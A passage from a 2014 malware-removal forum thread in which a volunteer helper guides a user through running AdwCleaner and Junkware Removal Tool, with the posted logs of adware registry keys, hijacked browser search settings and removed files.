Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{5D8C3CC3-3C05-38A1-B244-924A23115FE9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{641593AF-D9FD-30F7-B783-36E16F7A2E08}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{6D3C9858-2674-46E1-9112-107340758481}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{711FC48A-1356-3932-94D8-A8B733DBC7E4}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{72227B7F-1F02-3560-95F5-592E68BACC0C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{79C9FA6C-352A-49BA-89BA-85077BC35DC3}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7B5E8CE3-4722-4C0E-A236-A6FF731BEF37}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{890D4F59-5ED0-3CB4-8E0E-74A5A86E7ED0}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{8C68913C-AC3C-4494-8B9C-984D87C85003}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{8D019513-083F-4AA5-933F-7D43A6DA82C4}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{909112FE-C4A2-4990-A499-E58867D55B15}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{923F6FB8-A390-370E-A0D2-DD505432481D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{9BBB26EF-B178-35D6-9D3D-B485F4279FE5}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{9BEEB5A2-8B02-465A-904D-FE5A447F59EB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{A62DDBE0-8D2A-339A-B089-8CBCC5CD322A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{A82AD04D-0B8E-3A49-947B-6A69A8A9C96D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{AB4DA692-F26B-403C-AF8F-FD87D121F8F1}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{ADEB3CC9-A05D-4FCC-BD09-9025456AA3EA}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B06D4521-D09C-3F41-8E39-9D784CCA2A75}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B618C19D-A418-4586-80C6-09DBDA9C748E}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B68B00A0-95B9-4162-BA45-7A1113317DA9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{BFE45A8B-650C-4E99-A3F4-CC6A2874893B}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C06DAD42-6F39-4CE1-83CC-9A8B9105E556}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C2E799D0-43A5-3477-8A98-FC5F3677F35C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D16107CD-2AD5-46A8-BA59-303B7C32C500}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D25B101F-8188-3B43-9D85-201F372BC205}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D2BA7595-5E44-3F1E-880F-03B3139FA5ED}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D35F5C81-17D9-3E1C-A1FC-4472542E1D25}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D8FA96CA-B250-312C-AF34-4FF1DD72589D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DAFC1E63-3359-416D-9BC2-E7DCA6F7B0F3}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DC5E5C44-80FD-3697-9E65-9F286D92F3E7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E1B4C9DE-D741-385F-981E-6745FACE6F01}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E413D78F-283C-45F1-9992-8EF7D55A4933}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E7B623F5-9715-3F9F-A671-D1485A39F8A2}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E7C2FDF1-1635-41B4-8207-C1684B6807D7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{ED916A7B-7C68-3198-B87D-2DABC30A5587}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EFA1BDB2-BB3D-3D9A-8EB5-D0D22E0F64F4}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F4CBF4DD-F8FE-35BA-BB7E-68304DAAB70B}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F9F5A267-FA5A-4CA3-8BE5-4C1EEAD01011}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{FC32005D-E27C-32E0-ADFA-152F598B75E7}
Key Found : [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\aoejbmmillcdifgagjpdlaamnalbielp
Key Found : [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2FA28606-DE77-4029-AF96-B231E3B8F827}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B7FCA997-D0FB-4FE0-8AFD-255E89CF9671}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D43B3890-80C7-4010-A95D-1E77B5924DC3}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0238BBE24EA3A70408B81E4BB89C15E5
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FF2AEFF45EEA0A48A4B33C1973B6094
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29799DE249E7DBC459FC6C8F07EB8375
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\305B09CE8C53A214DB58887F62F25536
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3152E1F19977892449DC968802CE8964
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\43C098337DB065A49B665D4EA7F16D1C
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A71991503412AEB42838B02C5ED9F9CD
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F7652513C62FF63448CFF05163719DB7
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{AE07101B-46D4-4A98-AF68-0333EA26E113}]
Value Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{AE07101B-46D4-4A98-AF68-0333EA26E113}]
***** [ Browsers ] *****
-\\ Internet Explorer v11.0.9600.17344
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Search [Default_Search_URL] - hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgFhefpmtCWhdsfwUGzVtSS31cKt68r9hY2PwIAbfNvR8oc5qZ48KRcW1q-qSM8GMevI4JkLlftBIiP6ewu-SMswYTUYy4ZkxmLmlYS_5x5_ywF7RdR0bkv9VPO67GGgg,&q={searchTerms}
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Search [SearchAssistant] - hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgFhefpmtCWhdsfwUGzVtSS31cKt68r9hY2PwIAbfNvR8oc5qZ48KRcW1q-qSM8GMevI4JkLlftBIiP6ewu-SMswYTUYy4ZkxmLmlYS_5x5_ywF7RdR0bkv9VPO67GGgg,&q={searchTerms}
Setting Found : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [Default] - hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgFhefpmtCWhdsfwUGzVtSS31cKt68r9hY2PwIAbfNvR8oc5qZ48KRcW1q-qSM8GMevI4JkLlftBIiP6ewu-SMswYTUYy4ZkxmLmlYS_5x5_ywF7RdR0bkv9VPO67GGgg,&q={searchTerms}
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchUrl [Default] - hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgFhefpmtCWhdsfwUGzVtSS31cKt68r9hY2PwIAbfNvR8oc5qZ48KRcW1q-qSM8GMevI4JkLlftBIiP6ewu-SMswYTUYy4ZkxmLmlYS_5x5_ywF7RdR0bkv9VPO67GGgg,&q={searchTerms}
-\\ Google Chrome v38.0.2125.111
[C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=sb&qsrc=2869
*************************
AdwCleaner[R0].txt - [18989 octets] - [08/11/2014 12:03:46]
########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [19050 octets] ##########
#8
Conspire
-
- Retired Classroom Teacher
-
- 5,806 posts
SuperHelper
Posted 08 November 2014 - 08:55 PM
Double click on AdwCleaner.exe to run the tool again.
- Click on the Scan button.
- AdwCleaner will begin to scan your computer like it did before.
- This time click on the Clean button.
- Press OK when asked to close all programs and follow the onscreen prompts.
- Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
- After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically (where the largest value of # represents the most recent report).
- Copy and paste the contents of that logfile in your next reply.
- A copy of that logfile will also be saved in the C:\AdwCleaner folder.
===================================================
Please download Junkware Removal Tool to your desktop.
- Shut down your protection software now to avoid potential conflicts.
- Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
- The tool will open and start scanning your system.
- Please be patient as this can take a while to complete depending on your system's specifications.
- On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
- Post the contents of JRT.txt into your next message.
===================================================
On your next reply please post :
Adwcleaner log
JRT log
Please STOP and let me know if you have any problems in performing with the steps above or any questions you may have.
Proud Graduate of the WTT Classroom
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
#9
Conor Detwiller
-
- Authentic Member
-
- 6 posts
New Member
Posted 08 November 2014 - 10:42 PM
I Ran the adware clean up and I accidently closed the log, so I ran it again, not sure if that effects anything but here are the logs.
# AdwCleaner v4.100 - Report created 08/11/2014 at 23:35:14
# DB v2014-11-07.1
# Updated 08/11/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : MoM - MOM-HP
# Running from : C:\Users\MoM\Desktop\AdwCleaner.exe
# Option : Clean
***** [ Services ] *****
***** [ Files / Folders ] *****
***** [ Scheduled Tasks ] *****
***** [ Shortcuts ] *****
***** [ Registry ] *****
***** [ Browsers ] *****
-\\ Internet Explorer v11.0.9600.17344
-\\ Google Chrome v38.0.2125.111
*************************
AdwCleaner[R0].txt - [19499 octets] - [08/11/2014 12:03:46]
AdwCleaner[R1].txt - [19560 octets] - [08/11/2014 22:58:33]
AdwCleaner[R2].txt - [915 octets] - [08/11/2014 23:30:38]
AdwCleaner[R3].txt - [974 octets] - [08/11/2014 23:32:25]
AdwCleaner[S0].txt - [18331 octets] - [08/11/2014 23:03:31]
AdwCleaner[S1].txt - [889 octets] - [08/11/2014 23:35:14]
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [948 octets] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.7 (11.08.2014:1)
OS: Windows 7 Home Premium x64
Ran by MoM on Sat 11/08/2014 at 23:20:36.68
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~ Services
~~~ Registry Values
Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\SMessaging [Strongvault]
Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-19\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-20\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-21-4081318669-4177893195-338242575-1000\Software\Microsoft\Internet Explorer\Main\\Start Page
~~~ Registry Keys
~~~ Files
Successfully deleted: [File] "C:\Windows\couponprinter.ocx"
Successfully deleted: [File] C:\Windows\prefetch\GOOGLETOOLBARNOTIFIER.EXE-7AE0A20E.pf
Successfully deleted: [File] C:\Windows\prefetch\GOOGLETOOLBARUSER_32.EXE-34B1B1C5.pf
~~~ Folders
Successfully deleted: [Folder] "C:\ProgramData\strongvault online backup"
Successfully deleted: [Folder] "C:\Users\MoM\appdata\local\strongvault online backup"
Successfully deleted: [Folder] "C:\Users\MoM\appdata\local\toparcadehits"
Successfully deleted: [Folder] "C:\Program Files (x86)\coupons"
Successfully deleted: [Folder] "C:\ai_recyclebin"
Successfully deleted: [Folder] "C:\Windows\syswow64\ai_recyclebin"
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{00903DE1-EFD3-40CA-85CB-25ACAB6E4987}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{20FAC2DA-91B3-45C9-B037-54038B948B20}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{22140BB0-AE7C-4587-BCDD-36BF8D954CF6}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{2714C1C1-3DFD-49AC-8E6F-CB922C2AF730}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{5DB21507-2E68-481A-9EEF-DD2C05800DB9}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{5ED02099-31EA-40B7-8C7B-6F47B0163BBC}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{903CF683-CDB1-4742-9927-A949FBB70C4C}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{95F65716-B749-44AB-95D2-654B587FB4FB}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{C2353A7D-6D93-4C40-B055-3D874714FD4F}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{E5D4237F-BC65-4853-BAD4-9368AD6F083F}
Successfully deleted: [Empty Folder] C:\Users\MoM\appdata\local\{F78AF8B4-B0A6-45F5-A424-303303B4E154}
~~~ Event Viewer Logs were cleared
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 11/08/2014 at 23:27:42.84
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#10
Conspire
-
- Retired Classroom Teacher
-
- 5,806 posts
SuperHelper
Posted 09 November 2014 - 02:31 AM
Don't worry about that. How is it behaving now?
Proud Graduate of the WTT Classroom
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
#11
Conor Detwiller
-
- Authentic Member
-
- 6 posts
New Member
Posted 09 November 2014 - 11:35 AM
All is fine with dllhost.exe but now Xaiznistvpj.exe is doing the same, its is from google chrome and I deleted all the processed then put in in recycling bin and cleared out the bin and restarted my comp, but it was still there. Can you help?
#12
Conspire
-
- Retired Classroom Teacher
-
- 5,806 posts
SuperHelper
Posted 10 November 2014 - 06:30 AM
Can you please run FRST again?
Proud Graduate of the WTT Classroom
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
